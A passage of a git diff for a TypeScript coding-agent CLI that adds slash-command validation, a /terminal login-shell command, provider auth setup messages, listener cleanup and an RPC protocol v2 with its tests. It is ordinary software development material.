catch { + // If suspend fails (e.g. SIGTSTP not supported), ensure the + // SIGINT listener doesn't leak. process.removeListener("SIGINT", ignoreSigint); - this.ui.start(); - this.ui.requestRender(true); - }); - - // Stop the TUI (restore terminal to normal mode) - this.ui.stop(); - - // Send SIGTSTP to process group (pid=0 means all processes in group) - process.kill(0, "SIGTSTP"); + } } private async handleFollowUp(): Promise { const text = (this.editor.getExpandedText?.() ?? this.editor.getText()).trim(); if (!text) return; + if (text.startsWith("/") && !this.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + this.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`); + return; + } + // Queue input during compaction (extension commands execute immediately) if (this.session.isCompacting) { if (this.isExtensionCommand(text)) { @@ -2460,7 +2522,14 @@ export class InteractiveMode { // Determine editor (respect $VISUAL, then $EDITOR) const editorCmd = process.env.VISUAL || process.env.EDITOR; if (!editorCmd) { - this.showWarning("No editor configured. Set $VISUAL or $EDITOR environment variable."); + let msg = "No editor configured. Set $VISUAL or $EDITOR environment variable."; + if (process.env.TERM_PROGRAM === "iTerm.app") { + msg += + "\n\nTip: If you meant to open the GSD dashboard (Ctrl+Alt+G), set Left Option Key to" + + " \"Esc+\" in iTerm2 → Profiles → Keys. With the default \"Normal\" setting," + + " Ctrl+Alt+G sends Ctrl+G instead."; + } + this.showWarning(msg); return; } @@ -2624,6 +2693,12 @@ export class InteractiveMode { } private queueCompactionMessage(text: string, mode: "steer" | "followUp"): void { + if (text.startsWith("/") && !this.isKnownSlashCommand(text)) { + const command = text.split(/\s/)[0]; + this.showError(`Unknown command: ${command}. Use slash autocomplete to see available commands.`); + return; + } + this.compactionQueuedMessages.push({ text, mode }); this.editor.addToHistory?.(text); this.editor.setText(""); @@ -2642,6 +2717,32 @@ export class InteractiveMode { return !!extensionRunner.getCommand(commandName); } + private isKnownSlashCommand(text: string): boolean { + if (!text.startsWith("/")) return false; + + const spaceIndex = text.indexOf(" "); + const commandName = spaceIndex === -1 ? text.slice(1) : text.slice(1, spaceIndex); + + if (BUILTIN_SLASH_COMMANDS.some((command) => command.name === commandName)) { + return true; + } + + if (this.isExtensionCommand(text)) { + return true; + } + + if (this.session.promptTemplates.some((template) => template.name === commandName)) { + return true; + } + + if (commandName.startsWith("skill:") && this.settingsManager.getEnableSkillCommands()) { + const skillName = commandName.slice("skill:".length); + return this.session.resourceLoader.getSkills().skills.some((skill) => skill.name === skillName); + } + + return false; + } + private async flushCompactionQueue(options?: { willRetry?: boolean }): Promise { if (this.compactionQueuedMessages.length === 0) { return; @@ -2775,6 +2876,7 @@ export class InteractiveMode { respectGitignoreInPicker: this.settingsManager.getRespectGitignoreInPicker(), quietStartup: this.settingsManager.getQuietStartup(), clearOnShrink: this.settingsManager.getClearOnShrink(), + timestampFormat: this.settingsManager.getTimestampFormat(), }, { onAutoCompactChange: (enabled) => { @@ -2878,6 +2980,9 @@ export class InteractiveMode { this.settingsManager.setRespectGitignoreInPicker(enabled); this.autocompleteProvider?.setRespectGitignore(enabled); }, + onTimestampFormatChange: (format) => { + this.settingsManager.setTimestampFormat(format); + }, onCancel: () => { done(); this.ui.requestRender(); @@ -3307,6 +3412,23 @@ export class InteractiveMode { done(); this.ui.requestRender(); }, + async (provider: string) => { + done(); + + const action = getProviderSetupAction({ + provider, + authMode: this.session.modelRegistry.getProviderAuthMode(provider), + hasAuth: this.session.modelRegistry.authStorage.hasAuth(provider), + }); + + if (action.kind === "oauth-login") { + await this.showLoginDialog(provider); + return; + } + + this.showStatus(action.message); + this.ui.requestRender(); + }, ); return { component, focus: component }; }); @@ -3401,14 +3523,6 @@ export class InteractiveMode { this.ui.setFocus(dialog); this.ui.requestRender(); - // Promise for manual code input (racing with callback server) - let manualCodeResolve: ((code: string) => void) | undefined; - let manualCodeReject: ((err: Error) => void) | undefined; - const manualCodePromise = new Promise((resolve, reject) => { - manualCodeResolve = resolve; - manualCodeReject = reject; - }); - // Restore editor helper — also disposes the dialog to reject any // dangling promises and prevent the UI from getting stuck. const restoreEditor = () => { @@ -3424,23 +3538,7 @@ export class InteractiveMode { onAuth: (info: { url: string; instructions?: string }) => { dialog.showAuth(info.url, info.instructions); - if (usesCallbackServer) { - // Show input for manual paste, racing with callback - dialog - .showManualInput("Paste redirect URL below, or complete login in browser:") - .then((value) => { - if (value && manualCodeResolve) { - manualCodeResolve(value); - manualCodeResolve = undefined; - } - }) - .catch(() => { - if (manualCodeReject) { - manualCodeReject(new Error("Login cancelled")); - manualCodeReject = undefined; - } - }); - } else if (providerId === "github-copilot") { + if (!usesCallbackServer && providerId === "github-copilot") { // GitHub Copilot polls after onAuth dialog.showWaiting("Waiting for browser authentication..."); } @@ -3455,7 +3553,12 @@ export class InteractiveMode { dialog.showProgress(message); }, - onManualCodeInput: () => manualCodePromise, + // Callback-server providers race browser callback with pasted redirect URL. + // Keep manual-input promise ownership inside provider flow to avoid + // orphaned rejections when the callback is not consumed. + onManualCodeInput: usesCallbackServer + ? () => dialog.showManualInput("Paste redirect URL below, or complete login in browser:") + : undefined, signal: dialog.signal, }); @@ -3487,12 +3590,6 @@ export class InteractiveMode { this.showStatus(`Logged in to ${providerName}. Credentials saved to ${getAuthPath()}`); } catch (error: unknown) { restoreEditor(); - // Also reject the manual code promise if it's still pending - if (manualCodeReject) { - manualCodeReject(new Error("Login cancelled")); - manualCodeReject = undefined; - manualCodeResolve = undefined; - } const errorMsg = error instanceof Error ? error.message : String(error); if (errorMsg !== "Login cancelled" && !errorMsg.includes("Superseded") && !errorMsg.includes("disposed")) { this.showError(`Failed to login to ${providerName}: ${errorMsg}`); @@ -3645,8 +3742,9 @@ export class InteractiveMode { } } - private async handleBashCommand(command: string, excludeFromContext = false): Promise { + private async handleBashCommand(command: string, excludeFromContext = false, displayCommand?: string, loginShell?: boolean): Promise { const extensionRunner = this.session.extensionRunner; + const label = displayCommand || command; // Emit user_bash event to let extensions intercept const eventResult = extensionRunner @@ -3663,7 +3761,7 @@ export class InteractiveMode { const result = eventResult.result; // Create UI component for display - this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext); + this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext); if (this.session.isStreaming) { this.pendingMessagesContainer.addChild(this.bashComponent); this.pendingBashComponents.push(this.bashComponent); @@ -3691,7 +3789,7 @@ export class InteractiveMode { // Normal execution path (possibly with custom operations) const isDeferred = this.session.isStreaming; - this.bashComponent = new BashExecutionComponent(command, this.ui, excludeFromContext); + this.bashComponent = new BashExecutionComponent(label, this.ui, excludeFromContext); if (isDeferred) { // Show in pending area when agent is streaming @@ -3712,7 +3810,7 @@ export class InteractiveMode { this.ui.requestRender(); } }, - { excludeFromContext, operations: eventResult?.operations }, + { excludeFromContext, operations: eventResult?.operations, loginShell }, ); if (this.bashComponent) { @@ -3801,6 +3899,33 @@ export class InteractiveMode { this.loadingAnimation = undefined; } this.clearExtensionTerminalInputListeners(); + + // Clean up branch change listener (Fix 1) + this._branchChangeUnsub?.(); + this._branchChangeUnsub = undefined; + + // Clean up theme change listener and watcher (Fix 2) + onThemeChange(() => {}); + stopThemeWatcher(); + + // Resolve any pending getUserInput promise so the run() loop can exit (Fix 3) + if (this.onInputCallback) { + this.onInputCallback(""); + this.onInputCallback = undefined; + } + + // Dispose extension widgets, custom footer, and custom header (Fix 4) + this.clearExtensionWidgets(); + if (this.customFooter?.dispose) { + this.customFooter.dispose(); + } + this.customFooter = undefined; + if (this.customHeader?.dispose) { + this.customHeader.dispose(); + } + this.customHeader = undefined; + this.autocompleteProvider = undefined; + this.footer.dispose(); this.footerDataProvider.dispose(); if (this.unsubscribe) { diff --git a/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts new file mode 100644 index 000000000..6f22384a5 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/interactive/provider-auth-setup.ts @@ -0,0 +1,40 @@ +import type { ProviderAuthMode } from "../../core/model-registry.js"; + +export type ProviderSetupAction = + | { kind: "oauth-login" } + | { kind: "status"; message: string }; + +export function getProviderSetupAction(options: { + provider: string; + authMode: ProviderAuthMode; + hasAuth: boolean; +}): ProviderSetupAction { + const { provider, authMode, hasAuth } = options; + + if (authMode === "oauth") { + return { kind: "oauth-login" }; + } + + if (authMode === "none") { + return { + kind: "status", + message: `${provider} does not need auth setup. Use /model to select it.`, + }; + } + + if (authMode === "externalCli") { + return { + kind: "status", + message: hasAuth + ? `${provider} is already authenticated. Use /model to select it.` + : `${provider} uses external CLI auth. Sign in with the provider CLI, then use /model.`, + }; + } + + return { + kind: "status", + message: hasAuth + ? `${provider} already has credentials configured. Use /model to select it.` + : `${provider} uses API-key auth, not OAuth. Configure its credentials, then use /model.`, + }; +} diff --git a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts index 46a0e82b0..c510e63b4 100644 --- a/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts +++ b/packages/pi-coding-agent/src/modes/interactive/slash-command-handlers.ts @@ -104,6 +104,9 @@ export interface SlashCommandContext { // For compaction executeCompaction(customInstructions?: string, isAuto?: boolean): Promise; + + // Bash execution + handleBashCommand(command: string, options?: { excludeFromContext?: boolean; displayCommand?: string; loginShell?: boolean }): Promise; } // --------------------------------------------------------------------------- @@ -133,7 +136,7 @@ export async function dispatchSlashCommand( await ctx.handleModelCommand(searchTerm); return true; } - if (text.startsWith("/export")) { + if (text === "/export" || text.startsWith("/export ")) { await handleExportCommand(text, ctx); return true; } @@ -220,6 +223,18 @@ export async function dispatchSlashCommand( await ctx.shutdown(); return true; } + if (text === "/terminal" || text.startsWith("/terminal ")) { + const command = text.startsWith("/terminal ") ? text.slice(10).trim() : ""; + if (!command) { + ctx.showWarning("Usage: /terminal (e.g. /terminal ping -c3 1.1.1.1)"); + return true; + } + // Run in the user's login shell ($SHELL -l -c) so PATH additions + // and env vars from shell profiles (.zprofile/.profile) are available. + // Note: shell aliases are not loaded (requires -i which has side effects). + await ctx.handleBashCommand(command, { loginShell: true }); + return true; + } return false; } diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts index db1a524a0..763b22734 100644 --- a/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts +++ b/packages/pi-coding-agent/src/modes/interactive/theme/theme.ts @@ -663,7 +663,7 @@ function setGlobalTheme(t: Theme): void { let currentThemeName: string | undefined; let themeWatcher: fs.FSWatcher | undefined; -let onThemeChangeCallback: (() => void) | undefined; +const onThemeChangeCallbacks = new Set<() => void>(); const registeredThemes = new Map(); export function setRegisteredThemes(themes: Theme[]): void { @@ -698,9 +698,7 @@ export function setTheme(name: string, enableWatcher: boolean = false): { succes if (enableWatcher) { startThemeWatcher(); } - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); return { success: true }; } catch (error) { // Theme is invalid - fall back to dark theme @@ -718,13 +716,12 @@ export function setThemeInstance(themeInstance: Theme): void { setGlobalTheme(themeInstance); currentThemeName = ""; stopThemeWatcher(); // Can't watch a direct instance - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); } -export function onThemeChange(callback: () => void): void { - onThemeChangeCallback = callback; +export function onThemeChange(callback: () => void): () => void { + onThemeChangeCallbacks.add(callback); + return () => { onThemeChangeCallbacks.delete(callback); }; } function startThemeWatcher(): void { @@ -755,10 +752,8 @@ function startThemeWatcher(): void { try { // Reload the theme setGlobalTheme(loadTheme(currentThemeName!)); - // Notify callback (to invalidate UI) - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + // Notify callbacks (to invalidate UI) + onThemeChangeCallbacks.forEach(cb => cb()); } catch (_error) { // Ignore errors (file might be in invalid state while being edited) } @@ -773,9 +768,7 @@ function startThemeWatcher(): void { themeWatcher.close(); themeWatcher = undefined; } - if (onThemeChangeCallback) { - onThemeChangeCallback(); - } + onThemeChangeCallbacks.forEach(cb => cb()); } }, 100); } diff --git a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts index c92763543..f1459a0bb 100644 --- a/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts +++ b/packages/pi-coding-agent/src/modes/interactive/theme/themes.ts @@ -23,7 +23,7 @@ const dark: ThemeJson = { blue: "#5f87ff", green: "#b5bd68", red: "#cc6666", - yellow: "#ffff00", + yellow: "#e6b800", gray: "#808080", dimGray: "#666666", darkGray: "#505050", @@ -113,6 +113,7 @@ const light: ThemeJson = { green: "#588458", red: "#aa5555", yellow: "#9a7326", + warning: "#7a5a00", mediumGray: "#6c6c6c", dimGray: "#767676", lightGray: "#b0b0b0", @@ -130,7 +131,7 @@ const light: ThemeJson = { borderMuted: "lightGray", success: "green", error: "red", - warning: "yellow", + warning: "warning", muted: "mediumGray", dim: "dimGray", text: "", diff --git a/packages/pi-coding-agent/src/modes/print-mode.ts b/packages/pi-coding-agent/src/modes/print-mode.ts index a2557f99b..a44266450 100644 --- a/packages/pi-coding-agent/src/modes/print-mode.ts +++ b/packages/pi-coding-agent/src/modes/print-mode.ts @@ -45,52 +45,62 @@ export async function runPrintMode(session: AgentSession, options: PrintModeOpti }); // Always subscribe to enable session persistence via _handleAgentEvent - session.subscribe((event) => { + const unsubscribe = session.subscribe((event) => { // In JSON mode, output all events if (mode === "json") { console.log(JSON.stringify(event)); } }); - // Send initial message with attachments - if (initialMessage) { - await session.prompt(initialMessage, { images: initialImages }); - } + let exitCode = 0; - // Send remaining messages - for (const message of messages) { - await session.prompt(message); - } + try { + // Send initial message with attachments + if (initialMessage) { + await session.prompt(initialMessage, { images: initialImages }); + } - // In text mode, output final response - if (mode === "text") { - const state = session.state; - const lastMessage = state.messages[state.messages.length - 1]; + // Send remaining messages + for (const message of messages) { + await session.prompt(message); + } - if (lastMessage?.role === "assistant") { - const assistantMsg = lastMessage as AssistantMessage; + // In text mode, output final response + if (mode === "text") { + const state = session.state; + const lastMessage = state.messages[state.messages.length - 1]; - // Check for error/aborted - if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") { - console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`); - process.exit(1); - } + if (lastMessage?.role === "assistant") { + const assistantMsg = lastMessage as AssistantMessage; - // Output text content - for (const content of assistantMsg.content) { - if (content.type === "text") { - console.log(content.text); + // Check for error/aborted + if (assistantMsg.stopReason === "error" || assistantMsg.stopReason === "aborted") { + console.error(assistantMsg.errorMessage || `Request ${assistantMsg.stopReason}`); + exitCode = 1; + } else { + // Output text content + for (const content of assistantMsg.content) { + if (content.type === "text") { + console.log(content.text); + } + } } } } + + // Ensure stdout is fully flushed before returning + // This prevents race conditions where the process exits before all output is written + await new Promise((resolve, reject) => { + process.stdout.write("", (err) => { + if (err) reject(err); + else resolve(); + }); + }); + } finally { + unsubscribe(); } - // Ensure stdout is fully flushed before returning - // This prevents race conditions where the process exits before all output is written - await new Promise((resolve, reject) => { - process.stdout.write("", (err) => { - if (err) reject(err); - else resolve(); - }); - }); + if (exitCode !== 0) { + process.exit(exitCode); + } } diff --git a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts index 8962c7340..5392defef 100644 --- a/packages/pi-coding-agent/src/modes/rpc/jsonl.ts +++ b/packages/pi-coding-agent/src/modes/rpc/jsonl.ts @@ -48,11 +48,17 @@ export function attachJsonlLineReader(stream: Readable, onLine: (line: string) = } }; + const onError = (_err: Error) => { + // Stream errors are non-fatal for JSONL reading + }; + stream.on("data", onData); stream.on("end", onEnd); + stream.on("error", onError); return () => { stream.off("data", onData); stream.off("end", onEnd); + stream.off("error", onError); }; } diff --git a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts index 84f78f950..4dda9b0c9 100644 --- a/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts +++ b/packages/pi-coding-agent/src/modes/rpc/remote-terminal.ts @@ -49,6 +49,12 @@ export class RemoteTerminal implements Terminal { return this._rows; } + get isTTY(): boolean { + // RemoteTerminal renders to a browser-based terminal emulator via + // the RPC bridge — it behaves like a real TTY for rendering purposes. + return true; + } + get kittyProtocolActive(): boolean { return false; } diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts index a3f91ecc4..e776bd8ad 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-client.ts @@ -11,7 +11,7 @@ import type { SessionStats } from "../../core/agent-session.js"; import type { BashResult } from "../../core/bash-executor.js"; import type { CompactionResult } from "../../core/compaction/index.js"; import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; -import type { RpcCommand, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js"; +import type { RpcCommand, RpcInitResult, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js"; // ============================================================================ // Types @@ -54,6 +54,7 @@ export type RpcEventListener = (event: AgentEvent) => void; export class RpcClient { private process: ChildProcess | null = null; private stopReadingStdout: (() => void) | null = null; + private _stderrHandler?: (data: Buffer) => void; private eventListeners: RpcEventListener[] = []; private pendingRequests: Map void; reject: (error: Error) => void }> = new Map(); @@ -90,9 +91,10 @@ export class RpcClient { }); // Collect stderr for debugging - this.process.stderr?.on("data", (data) => { + this._stderrHandler = (data: Buffer) => { this.stderr += data.toString(); - }); + }; + this.process.stderr?.on("data", this._stderrHandler); // Set up strict JSONL reader for stdout. this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => { @@ -127,6 +129,10 @@ export class RpcClient { this.stopReadingStdout?.(); this.stopReadingStdout = null; + if (this._stderrHandler) { + this.process.stderr?.removeListener("data", this._stderrHandler); + this._stderrHandler = undefined; + } this.process.kill("SIGTERM"); // Wait for process to exit @@ -392,6 +398,59 @@ export class RpcClient { return this.getData<{ commands: RpcSlashCommand[] }>(response).commands; } + /** + * Send a UI response to a pending extension_ui_request. + * Fire-and-forget — no request/response correlation. + */ + sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void { + if (!this.process?.stdin) { + throw new Error("Client not started"); + } + this.process.stdin.write(serializeJsonLine({ + type: "extension_ui_response", + id, + ...response, + })); + } + + /** + * Initialize a v2 protocol session. Must be sent as the first command. + * Returns the negotiated protocol version, session ID, and server capabilities. + */ + async init(options?: { clientId?: string }): Promise { + const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId }); + return this.getData(response); + } + + /** + * Request a graceful shutdown of the agent process. + * Waits for the response before the process exits. + */ + async shutdown(): Promise { + await this.send({ type: "shutdown" }); + // Wait for process to exit after shutdown acknowledgment + if (this.process) { + await new Promise((resolve) => { + const timeout = setTimeout(() => { + this.process?.kill("SIGKILL"); + resolve(); + }, 5000); + this.process?.on("exit", () => { + clearTimeout(timeout); + resolve(); + }); + }); + } + } + + /** + * Subscribe to specific event types (v2 only). + * Pass ["*"] to receive all events, or a list of event type strings to filter. + */ + async subscribe(events: string[]): Promise { + await this.send({ type: "subscribe", events }); + } + // ========================================================================= // Helpers // ========================================================================= @@ -482,8 +541,6 @@ export class RpcClient { const fullCommand = { ...command, id } as RpcCommand; return new Promise((resolve, reject) => { - this.pendingRequests.set(id, { resolve, reject }); - const timeout = setTimeout(() => { this.pendingRequests.delete(id); reject(new Error(`Timeout waiting for response to ${command.type}. Stderr: ${this.stderr}`)); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts index e15c81ae3..f2f8fbe4c 100644 --- a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts @@ -27,6 +27,7 @@ import type { RpcCommand, RpcExtensionUIRequest, RpcExtensionUIResponse, + RpcInitResult, RpcResponse, RpcSessionState, RpcSlashCommand, @@ -37,8 +38,11 @@ export type { RpcCommand, RpcExtensionUIRequest, RpcExtensionUIResponse, + RpcInitResult, + RpcProtocolVersion, RpcResponse, RpcSessionState, + RpcV2Event, } from "./rpc-types.js"; /** @@ -74,6 +78,16 @@ export async function runRpcMode(session: AgentSession): Promise { // Shutdown request flag let shutdownRequested = false; + // v2 protocol version detection state + let protocolVersion: 1 | 2 = 1; + let protocolLocked = false; + + // v2 runId threading: tracks the current execution run + let currentRunId: string | null = null; + + // v2 event filtering: null = no filter (all events); Set = only listed event types + let eventFilter: Set | null = null; + const embeddedTerminalEnabled = process.env.GSD_WEB_BRIDGE_TUI === "1"; const remoteTerminal = embeddedTerminalEnabled ? new RemoteTerminal({ @@ -424,8 +438,56 @@ export async function runRpcMode(session: AgentSession): Promise { void extensionsReadyPromise; // Output all agent events as JSON - session.subscribe((event) => { - output(event); + const unsubscribe = session.subscribe((event) => { + // v2: emit synthesized events before the regular event + if (protocolVersion === 2) { + // cost_update on assistant message_end + if (event.type === "message_end" && event.message.role === "assistant" && currentRunId) { + const stats = session.getSessionStats(); + const costUpdate = { + type: "cost_update" as const, + runId: currentRunId, + turnCost: session.getLastTurnCost(), + cumulativeCost: stats.cost, + tokens: { + input: stats.tokens.input, + output: stats.tokens.output, + cacheRead: stats.tokens.cacheRead, + cacheWrite: stats.tokens.cacheWrite, + }, + }; + if (!eventFilter || eventFilter.has("cost_update")) { + output(costUpdate); + } + } + + // execution_complete on agent_end + if (event.type === "agent_end" && currentRunId) { + const stats = session.getSessionStats(); + const completionEvent = { + type: "execution_complete" as const, + runId: currentRunId, + status: "completed" as const, + stats, + }; + if (!eventFilter || eventFilter.has("execution_complete")) { + output(completionEvent); + } + currentRunId = null; + } + } + + // Apply event filter (v2 only, applies to agent session events only) + if (protocolVersion === 2 && eventFilter && !eventFilter.has(event.type)) { + return; + } + + // Emit the regular event, with runId injection in v2 mode + if (protocolVersion === 2 && currentRunId) { + output({ ...event, runId: currentRunId }); + } else { + output(event); + } }); // Handle a single command @@ -438,6 +500,9 @@ export async function runRpcMode(session: AgentSession): Promise { // ================================================================= case "prompt": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; // Don't await - events will stream // Extension commands are executed immediately, file prompt templates are expanded // If streaming and streamingBehavior specified, queues via steer/followUp @@ -448,17 +513,23 @@ export async function runRpcMode(session: AgentSession): Promise { source: "rpc", }) .catch((e) => output(error(id, "prompt", e.message))); - return success(id, "prompt"); + return { id, type: "response", command: "prompt", success: true, ...(runId && { runId }) } as RpcResponse; } case "steer": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; await session.steer(command.message, command.images); - return success(id, "steer"); + return { id, type: "response", command: "steer", success: true, ...(runId && { runId }) } as RpcResponse; } case "follow_up": { + // v2: generate runId for execution tracking + const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined; + if (runId) currentRunId = runId; await session.followUp(command.message, command.images); - return success(id, "follow_up"); + return { id, type: "response", command: "follow_up", success: true, ...(runId && { runId }) } as RpcResponse; } case "abort": { @@ -709,9 +780,31 @@ export async function runRpcMode(session: AgentSession): Promise { return success(id, "terminal_redraw"); } + // ================================================================= + // v2 Protocol: subscribe + // ================================================================= + + case "subscribe": { + if (command.events.includes("*")) { + eventFilter = null; // wildcard = all events + } else { + eventFilter = new Set(command.events); + } + return success(id, "subscribe"); + } + + // ================================================================= + // v2 Protocol: shutdown + // ================================================================= + + case "shutdown": { + shutdownRequested = true; + return success(id, "shutdown"); + } + default: { - const unknownCommand = command as { type: string }; - return error(undefined, unknownCommand.type, `Unknown command: ${unknownCommand.type}`); + const unknownCommand = command as { type: string; id?: string }; + return error(unknownCommand.id, unknownCommand.type, `Unknown command: ${unknownCommand.type}`); } } }; @@ -730,6 +823,7 @@ export async function runRpcMode(session: AgentSession): Promise { await currentRunner.emit({ type: "session_shutdown" }); } + unsubscribe(); embeddedInteractiveMode?.stop(); detachInput(); process.stdin.pause(); @@ -740,7 +834,7 @@ export async function runRpcMode(session: AgentSession): Promise { try { const parsed = JSON.parse(line); - // Handle extension UI responses + // Handle extension UI responses (bypass protocol detection) if (parsed.type === "extension_ui_response") { const response = parsed as RpcExtensionUIResponse; const pending = pendingExtensionRequests.get(response.id); @@ -751,8 +845,33 @@ export async function runRpcMode(session: AgentSession): Promise { return; } - // Handle regular commands const command = parsed as RpcCommand; + + // Protocol version detection: first non-UI-response command locks the version + if (!protocolLocked) { + protocolLocked = true; + if (command.type === "init") { + protocolVersion = 2; + const initResult: RpcInitResult = { + protocolVersion: 2, + sessionId: session.sessionId, + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + output(success(command.id, "init", initResult)); + return; + } + // Non-init first message: lock to v1, fall through to normal handling + protocolVersion = 1; + } else if (command.type === "init") { + // Already locked — reject re-init + output(error(command.id, "init", "Protocol version already locked. init must be the first command.")); + return; + } + + // Handle regular commands const response = await handleCommand(command); output(response); diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts new file mode 100644 index 000000000..e08161186 --- /dev/null +++ b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts @@ -0,0 +1,971 @@ +/** + * RPC Protocol v2 test suite. + * + * Tests v1 backward compatibility, v2 init handshake, protocol locking, + * v2 feature type shapes, and RpcClient command serialization against + * mock child processes using PassThrough streams. + */ + +import { describe, it, beforeEach, afterEach, mock } from "node:test"; +import assert from "node:assert/strict"; +import { PassThrough } from "node:stream"; +import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js"; +import type { + RpcCommand, + RpcResponse, + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcV2Event, + RpcProtocolVersion, + RpcSessionState, +} from "./rpc-types.js"; + +// ============================================================================ +// Helpers +// ============================================================================ + +/** Collect JSONL output lines from a stream */ +function collectLines(stream: PassThrough): { lines: unknown[]; detach: () => void } { + const lines: unknown[] = []; + const detach = attachJsonlLineReader(stream, (line) => { + try { + lines.push(JSON.parse(line)); + } catch { + // skip non-JSON lines + } + }); + return { lines, detach }; +} + +/** Write a command as JSONL to a writable stream and wait for drain */ +function writeLine(stream: PassThrough, obj: unknown): void { + stream.write(serializeJsonLine(obj)); +} + +/** + * Create a mock "child process" with piped stdin/stdout. + * clientStdin → data flows into the "server" (from the client's perspective, this is what the client writes to) + * clientStdout ← data flows out of the "server" (from the client's perspective, this is what the client reads from) + * + * The test acts as the "server": read from clientStdin, write to clientStdout. + */ +function createMockProcess() { + // Client writes to this → server reads from it + const clientStdin = new PassThrough(); + // Server writes to this → client reads from it + const clientStdout = new PassThrough(); + + return { clientStdin, clientStdout }; +} + +/** Wait a tick for async handlers to process */ +function tick(ms = 10): Promise { + return new Promise((resolve) => setTimeout(resolve, ms)); +} + +// ============================================================================ +// JSONL utilities +// ============================================================================ + +describe("JSONL utilities", () => { + it("serializeJsonLine produces newline-terminated JSON", () => { + const result = serializeJsonLine({ type: "test", value: 42 }); + assert.equal(result, '{"type":"test","value":42}\n'); + }); + + it("serializeJsonLine handles nested objects", () => { + const result = serializeJsonLine({ a: { b: [1, 2, 3] } }); + assert.ok(result.endsWith("\n")); + const parsed = JSON.parse(result.trim()); + assert.deepEqual(parsed, { a: { b: [1, 2, 3] } }); + }); + + it("attachJsonlLineReader splits on LF only", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"a":1}\n{"b":2}\n'); + await tick(); + + assert.equal(lines.length, 2); + assert.deepEqual(lines[0], { a: 1 }); + assert.deepEqual(lines[1], { b: 2 }); + detach(); + }); + + it("attachJsonlLineReader handles partial writes", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"partial":'); + await tick(); + assert.equal(lines.length, 0); + + stream.write('"value"}\n'); + await tick(); + assert.equal(lines.length, 1); + assert.deepEqual(lines[0], { partial: "value" }); + detach(); + }); + + it("attachJsonlLineReader handles CR+LF", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"cr":"lf"}\r\n'); + await tick(); + assert.equal(lines.length, 1); + assert.deepEqual(lines[0], { cr: "lf" }); + detach(); + }); + + it("detach stops line delivery", async () => { + const stream = new PassThrough(); + const { lines, detach } = collectLines(stream); + + stream.write('{"before":1}\n'); + await tick(); + assert.equal(lines.length, 1); + + detach(); + + stream.write('{"after":2}\n'); + await tick(); + // Should still be 1 since we detached + assert.equal(lines.length, 1); + }); +}); + +// ============================================================================ +// v2 type shape assertions +// ============================================================================ + +describe("v2 type shapes", () => { + it("RpcInitResult has required fields", () => { + const initResult: RpcInitResult = { + protocolVersion: 2, + sessionId: "test-session-123", + capabilities: { + events: ["execution_complete", "cost_update"], + commands: ["init", "shutdown", "subscribe"], + }, + }; + assert.equal(initResult.protocolVersion, 2); + assert.ok(typeof initResult.sessionId === "string"); + assert.ok(Array.isArray(initResult.capabilities.events)); + assert.ok(Array.isArray(initResult.capabilities.commands)); + assert.ok(initResult.capabilities.events.includes("execution_complete")); + assert.ok(initResult.capabilities.events.includes("cost_update")); + assert.ok(initResult.capabilities.commands.includes("init")); + assert.ok(initResult.capabilities.commands.includes("shutdown")); + assert.ok(initResult.capabilities.commands.includes("subscribe")); + }); + + 